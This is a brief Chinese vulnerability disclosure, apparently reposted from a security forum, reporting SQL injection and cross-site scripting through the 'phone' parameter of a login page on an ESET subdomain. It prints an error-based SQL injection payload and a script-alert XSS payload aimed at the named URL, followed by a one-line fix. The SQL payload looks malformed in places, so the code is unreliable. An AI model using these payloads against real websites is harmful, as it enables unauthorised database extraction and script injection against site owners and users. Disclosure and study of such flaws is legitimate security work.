参数phone过滤不严,造成注入,以及跨站
注入以及跨站地址为 http://jf.eset测试数据.cn/index.php/user/lookpass
phone参数在手机号码处
sql:
' and(select 1 from(select count(*),concat((select (select (select *)) from column_name limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'x'='x
xss: '"<script>alert(/90sec luom/);</script>
修复方案:
给参数phone进行过滤吧。
查看更多关于eset分站登录框注入以及跨站 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14444